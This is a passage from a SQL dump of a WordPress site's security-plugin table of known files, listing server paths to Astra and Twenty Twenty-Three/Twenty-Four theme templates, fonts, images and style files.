(2911, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/builder/footer-row.php', 'wp-content/themes/astra/template-parts/footer/builder/footer-row.php'),
(2912, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/footer-sml-layout-2.php', 'wp-content/themes/astra/template-parts/footer/footer-sml-layout-2.php'),
(2913, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/footer-sml-layout.php', 'wp-content/themes/astra/template-parts/footer/footer-sml-layout.php'),
(2914, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/index.php', 'wp-content/themes/astra/template-parts/footer/index.php'),
(2915, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/builder/components.php', 'wp-content/themes/astra/template-parts/header/builder/components.php'),
(2916, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/builder/desktop-builder-layout.php', 'wp-content/themes/astra/template-parts/header/builder/desktop-builder-layout.php'),
(2917, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/builder/header-row.php', 'wp-content/themes/astra/template-parts/header/builder/header-row.php'),
(2918, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/builder/mobile-builder-layout.php', 'wp-content/themes/astra/template-parts/header/builder/mobile-builder-layout.php'),
(2919, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/builder/mobile-header-row.php', 'wp-content/themes/astra/template-parts/header/builder/mobile-header-row.php'),
(2920, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/header-main-layout.php', 'wp-content/themes/astra/template-parts/header/header-main-layout.php'),
(2921, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/header/index.php', 'wp-content/themes/astra/template-parts/header/index.php'),
(2922, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/index.php', 'wp-content/themes/astra/template-parts/index.php'),
(2923, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/scroll-to-top.php', 'wp-content/themes/astra/template-parts/scroll-to-top.php'),
(2924, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/single/content-header.php', 'wp-content/themes/astra/template-parts/single/content-header.php'),
(2925, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/single/index.php', 'wp-content/themes/astra/template-parts/single/index.php'),
(2926, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/single/single-layout.php', 'wp-content/themes/astra/template-parts/single/single-layout.php'),
(2927, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/single-banner.php', 'wp-content/themes/astra/template-parts/single-banner.php'),
(2928, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/special-banner.php', 'wp-content/themes/astra/template-parts/special-banner.php'),
(2929, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/theme.json', 'wp-content/themes/astra/theme.json'),
(2930, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/toolset-config.json', 'wp-content/themes/astra/toolset-config.json'),
(2931, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/wpml-config.xml', 'wp-content/themes/astra/wpml-config.xml'),
(2932, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra-child/functions.php', 'wp-content/themes/astra-child/functions.php'),
(2933, '/home/equipm11/public_html/happythinking.com/wp-content/themes/index.php', 'wp-content/themes/index.php'),
(2934, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/css/button-outline.css', 'wp-content/themes/twentytwentyfour/assets/css/button-outline.css'),
(2935, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt', 'wp-content/themes/twentytwentyfour/assets/fonts/cardo/LICENSE.txt'),
(2936, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2'),
(2937, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2'),
(2938, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff2'),
(2939, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-Italic-VariableFont_wdth,wght.woff2'),
(2940, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/InstrumentSans-VariableFont_wdth,wght.woff2'),
(2941, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt', 'wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt'),
(2942, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2'),
(2943, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt', 'wp-content/themes/twentytwentyfour/assets/fonts/inter/LICENSE.txt'),
(2944, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-Italic-VariableFont_wght.woff2'),
(2945, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2', 'wp-content/themes/twentytwentyfour/assets/fonts/jost/Jost-VariableFont_wght.woff2'),
(2946, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt', 'wp-content/themes/twentytwentyfour/assets/fonts/jost/OFL.txt'),
(2947, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp', 'wp-content/themes/twentytwentyfour/assets/images/abstract-geometric-art.webp'),
(2948, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp', 'wp-content/themes/twentytwentyfour/assets/images/angular-roof.webp'),
(2949, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp', 'wp-content/themes/twentytwentyfour/assets/images/art-gallery.webp'),
(2950, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp', 'wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp'),
(2951, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp', 'wp-content/themes/twentytwentyfour/assets/images/green-staircase.webp'),
(2952, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp', 'wp-content/themes/twentytwentyfour/assets/images/hotel-facade.webp'),
(2953, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/icon-message.webp', 'wp-content/themes/twentytwentyfour/assets/images/icon-message.webp'),
(2954, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/museum.webp', 'wp-content/themes/twentytwentyfour/assets/images/museum.webp'),
(2955, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp', 'wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp'),
(2956, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/assets/images/windows.webp', 'wp-content/themes/twentytwentyfour/assets/images/windows.webp'),
(2957, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/functions.php', 'wp-content/themes/twentytwentyfour/functions.php'),
(2958, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/parts/footer.html', 'wp-content/themes/twentytwentyfour/parts/footer.html'),
(2959, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/parts/header.html', 'wp-content/themes/twentytwentyfour/parts/header.html'),
(2960, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/parts/post-meta.html', 'wp-content/themes/twentytwentyfour/parts/post-meta.html'),
(2961, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/parts/sidebar.html', 'wp-content/themes/twentytwentyfour/parts/sidebar.html'),
(2962, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/banner-hero.php', 'wp-content/themes/twentytwentyfour/patterns/banner-hero.php'),
(2963, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/banner-project-description.php', 'wp-content/themes/twentytwentyfour/patterns/banner-project-description.php'),
(2964, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php', 'wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php'),
(2965, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php', 'wp-content/themes/twentytwentyfour/patterns/cta-pricing.php'),
(2966, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php', 'wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php'),
(2967, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php', 'wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php'),
(2968, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php', 'wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php'),
(2969, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php', 'wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php'),
(2970, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php', 'wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php'),
(2971, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/footer.php', 'wp-content/themes/twentytwentyfour/patterns/footer.php'),
(2972, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php', 'wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php'),
(2973, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php', 'wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php'),
(2974, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php', 'wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php'),
(2975, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php', 'wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php'),
(2976, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php', 'wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php'),
(2977, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-404.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-404.php'),
(2978, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-comments.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-comments.php'),
(2979, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php'),
(2980, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php'),
(2981, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php'),
(2982, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php'),
(2983, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-search.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-search.php'),
(2984, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php', 'wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php'),
(2985, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-about-business.php', 'wp-content/themes/twentytwentyfour/patterns/page-about-business.php'),
(2986, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php', 'wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php'),
(2987, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-home-business.php', 'wp-content/themes/twentytwentyfour/patterns/page-home-business.php'),
(2988, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php', 'wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php'),
(2989, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php'),
(2990, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php', 'wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php'),
(2991, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php', 'wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php'),
(2992, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php', 'wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php'),
(2993, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-1-col.php', 'wp-content/themes/twentytwentyfour/patterns/posts-1-col.php'),
(2994, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-3-col.php', 'wp-content/themes/twentytwentyfour/patterns/posts-3-col.php'),
(2995, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php', 'wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php'),
(2996, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php', 'wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php'),
(2997, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php', 'wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php'),
(2998, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/posts-list.php', 'wp-content/themes/twentytwentyfour/patterns/posts-list.php'),
(2999, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/team-4-col.php', 'wp-content/themes/twentytwentyfour/patterns/team-4-col.php'),
(3000, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php', 'wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php'),
(3001, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php'),
(3002, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php', 'wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php'),
(3003, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-home-business.php', 'wp-content/themes/twentytwentyfour/patterns/template-home-business.php'),
(3004, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php'),
(3005, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php', 'wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php'),
(3006, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php'),
(3007, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php', 'wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php'),
(3008, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php'),
(3009, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php', 'wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php'),
(3010, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php', 'wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php'),
(3011, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php', 'wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php'),
(3012, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php', 'wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php'),
(3013, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php', 'wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php'),
(3014, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-faq.php', 'wp-content/themes/twentytwentyfour/patterns/text-faq.php'),
(3015, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php', 'wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php'),
(3016, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-project-details.php', 'wp-content/themes/twentytwentyfour/patterns/text-project-details.php'),
(3017, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php', 'wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(3018, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/readme.txt', 'wp-content/themes/twentytwentyfour/readme.txt'),
(3019, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/screenshot.png', 'wp-content/themes/twentytwentyfour/screenshot.png'),
(3020, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/style.css', 'wp-content/themes/twentytwentyfour/style.css'),
(3021, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/ember.json', 'wp-content/themes/twentytwentyfour/styles/ember.json'),
(3022, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/fossil.json', 'wp-content/themes/twentytwentyfour/styles/fossil.json'),
(3023, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/ice.json', 'wp-content/themes/twentytwentyfour/styles/ice.json'),
(3024, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/maelstrom.json', 'wp-content/themes/twentytwentyfour/styles/maelstrom.json'),
(3025, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/mint.json', 'wp-content/themes/twentytwentyfour/styles/mint.json'),
(3026, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/onyx.json', 'wp-content/themes/twentytwentyfour/styles/onyx.json'),
(3027, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/styles/rust.json', 'wp-content/themes/twentytwentyfour/styles/rust.json'),
(3028, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/404.html', 'wp-content/themes/twentytwentyfour/templates/404.html'),
(3029, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/archive.html', 'wp-content/themes/twentytwentyfour/templates/archive.html'),
(3030, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/home.html', 'wp-content/themes/twentytwentyfour/templates/home.html'),
(3031, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/index.html', 'wp-content/themes/twentytwentyfour/templates/index.html'),
(3032, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/page-no-title.html', 'wp-content/themes/twentytwentyfour/templates/page-no-title.html'),
(3033, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/page-wide.html', 'wp-content/themes/twentytwentyfour/templates/page-wide.html'),
(3034, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html', 'wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html'),
(3035, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/page.html', 'wp-content/themes/twentytwentyfour/templates/page.html'),
(3036, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/search.html', 'wp-content/themes/twentytwentyfour/templates/search.html'),
(3037, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html', 'wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html'),
(3038, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/templates/single.html', 'wp-content/themes/twentytwentyfour/templates/single.html'),
(3039, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentyfour/theme.json', 'wp-content/themes/twentytwentyfour/theme.json'),
(3040, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2'),
(3041, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2'),
(3042, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2'),
(3043, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2'),
(3044, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt', 'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt'),
(3045, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2'),
(3046, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2'),
(3047, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2'),
(3048, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2'),
(3049, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt', 'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt'),
(3050, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf', 'wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf'),
(3051, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt', 'wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt'),
(3052, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md', 'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md'),
(3053, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2'),
(3054, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2'),
(3055, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2'),
(3056, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2', 'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2'),
(3057, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/parts/comments.html', 'wp-content/themes/twentytwentythree/parts/comments.html'),
(3058, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/parts/footer.html', 'wp-content/themes/twentytwentythree/parts/footer.html'),
(3059, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/parts/header.html', 'wp-content/themes/twentytwentythree/parts/header.html'),
(3060, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/parts/post-meta.html', 'wp-content/themes/twentytwentythree/parts/post-meta.html'),
(3061, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/call-to-action.php', 'wp-content/themes/twentytwentythree/patterns/call-to-action.php'),
(3062, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/footer-default.php', 'wp-content/themes/twentytwentythree/patterns/footer-default.php'),
(3063, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/hidden-404.php', 'wp-content/themes/twentytwentythree/patterns/hidden-404.php'),
(3064, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/hidden-comments.php', 'wp-content/themes/twentytwentythree/patterns/hidden-comments.php'),
(3065, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/hidden-no-results.php', 'wp-content/themes/twentytwentythree/patterns/hidden-no-results.php'),
(3066, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/patterns/post-meta.php', 'wp-content/themes/twentytwentythree/patterns/post-meta.php'),
(3067, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/readme.txt', 'wp-content/themes/twentytwentythree/readme.txt'),
(3068, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/screenshot.png', 'wp-content/themes/twentytwentythree/screenshot.png'),
(3069, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/style.css', 'wp-content/themes/twentytwentythree/style.css'),
(3070, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/aubergine.json', 'wp-content/themes/twentytwentythree/styles/aubergine.json'),
(3071, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/block-out.json', 'wp-content/themes/twentytwentythree/styles/block-out.json'),
(3072, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/canary.json', 'wp-content/themes/twentytwentythree/styles/canary.json'),
(3073, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/electric.json', 'wp-content/themes/twentytwentythree/styles/electric.json'),
(3074, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/grapes.json', 'wp-content/themes/twentytwentythree/styles/grapes.json'),
(3075, '/home/equipm11/public_html/happythinking.com/wp-content/themes/twentytwentythree/styles/marigold.json', 'wp-content/themes/twentytwentythree/styles/marigold.json'),
